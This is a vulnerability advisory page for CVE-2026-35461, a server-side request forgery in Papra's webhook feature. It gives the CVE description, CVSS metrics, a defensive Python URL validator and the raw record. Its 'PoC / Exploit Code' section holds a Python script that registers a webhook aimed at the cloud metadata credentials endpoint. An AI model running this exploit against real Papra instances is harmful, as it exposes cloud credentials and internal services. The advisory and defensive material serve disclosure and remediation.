Security Vulnerability Report
CVE-2026-35461 CVSS 5.0 MEDIUM

CVE-2026-35461

Published: 2026-04-07 15:17:44
Last Modified: 2026-04-24 15:29:01

Description

Papra is a minimalistic document management and archiving platform. Prior to 26.4.0, the Papra webhook system allows authenticated users to register arbitrary URLs as webhook endpoints with no validation of the destination address. The server makes outbound HTTP POST requests to registered URLs, including localhost, internal network ranges, and cloud provider metadata endpoints, on every document event. This vulnerability is fixed in 26.4.0.
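
The flaw above is a classic server-side request forgery through user-controlled webhook destinations. The following is an added example, not Papra's code or its 26.4.0 fix: a destination check of the kind a webhook registration endpoint needs, refusing literal and DNS-resolved addresses in loopback, private, link-local (which covers the 169.254.169.254 metadata endpoint) and other non-public ranges. The function names and the injectable `resolver` parameter are assumptions made so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_public_address(ip_text: str) -> bool:
    """True only for globally routable unicast: rejects loopback, RFC 1918 / ULA,
    link-local (covers the 169.254.169.254 metadata endpoint), CGNAT, multicast,
    unspecified and reserved space, also in IPv4-mapped IPv6 form."""
    ip = ipaddress.ip_address(ip_text)
    mapped = getattr(ip, "ipv4_mapped", None)  # unwrap ::ffff:a.b.c.d
    if mapped is not None:
        ip = mapped
    return ip.is_global and not ip.is_multicast

def default_resolver(host: str) -> list[str]:
    """Every address the name publishes (A and AAAA), via the system resolver."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

def validate_webhook_url(url: str, resolver=default_resolver) -> tuple[bool, str]:
    """Return (ok, reason) for a user-supplied webhook destination; `resolver`
    is injectable (assumed helper) so the check can be exercised offline."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme must be http or https"
    if parts.username or parts.password:
        return False, "credentials in the URL are not allowed"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    try:
        ipaddress.ip_address(host)
        addresses = [host]  # literal IP: no DNS lookup needed
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError as exc:  # socket.gaierror is a subclass
            return False, f"hostname does not resolve: {exc}"
    if not addresses:
        return False, "hostname does not resolve"
    # Every published record must be public; one internal record is enough to refuse.
    # A registration-time check alone does not stop DNS rebinding: the sender should
    # re-resolve at delivery time and connect only to an address it has validated.
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"destination resolves to non-public address {addr}"
    return True, "ok"
```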

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:papra:papra:*:*:*:*:*:*:*:* - VULNERABLE
Papra < 26.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the Papra instance
target_url = "http://target-papra-instance.com/api/webhooks"

# Attacker's session cookie (obtained after authentication)
cookies = {
    "session": "authenticated_session_cookie_here"
}

# Malicious payload pointing to internal metadata service or localhost
internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Data to register the malicious webhook
webhook_data = {
    "url": internal_target,
    "events": ["document.created"]
}

try:
    # Send request to register the webhook
    response = requests.post(target_url, json=webhook_data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Malicious webhook registered successfully.")
        print("[+] Trigger a document event to force the server to send a request to:", internal_target)
    else:
        print("[-] Failed to register webhook.")
        print("Status code:", response.status_code)
        print("Response:", response.text)
except Exception as e:
    print("Error:", e)

References

https://github.com/papra-hq/papra/security/advisories/GHSA-cjw7-qg95-58mq - Exploit, Vendor Advisory

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35461",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T15:17:44.047",
    "lastModified": "2026-04-24T15:29:00.790",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Papra is a minimalistic document management and archiving platform. Prior to 26.4.0, the Papra webhook system allows authenticated users to register arbitrary URLs as webhook endpoints with no validation of the destination address. The server makes outbound HTTP POST requests to registered URLs, including localhost, internal network ranges, and cloud provider metadata endpoints, on every document event. This vulnerability is fixed in 26.4.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:papra:papra:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "26.4.0",
                "matchCriteriaId": "D2F10801-36E9-47AD-AD2D-DA4709B67B72"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/papra-hq/papra/security/advisories/GHSA-cjw7-qg95-58mq",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/papra-hq/papra/security/advisories/GHSA-cjw7-qg95-58mq",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}